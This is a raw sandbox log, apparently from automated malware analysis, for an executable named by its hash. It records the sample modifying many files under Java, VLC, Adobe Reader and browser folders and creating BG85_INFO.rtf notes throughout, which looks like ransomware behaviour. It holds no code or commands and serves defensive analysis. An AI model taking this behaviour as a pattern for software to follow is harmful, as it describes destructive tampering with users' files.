c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ndjamena c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\America\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\notification_helper.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\PST8PDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.bfc c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UTC c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\en-US\Journal.exe.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\To_Do_List.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santarem c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ms.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rankin_Inlet c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\ssvagent.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cuiaba c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Colombo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8PDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guyana c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+1 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Easter c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\jvm.hprof.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Brussels c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Berlin c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh89 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Nairobi c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yakutat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lord_Howe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\browser\features\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tahiti c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chatham c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\PopBackup.m4a c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Mawson c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belem c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\skins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Budapest 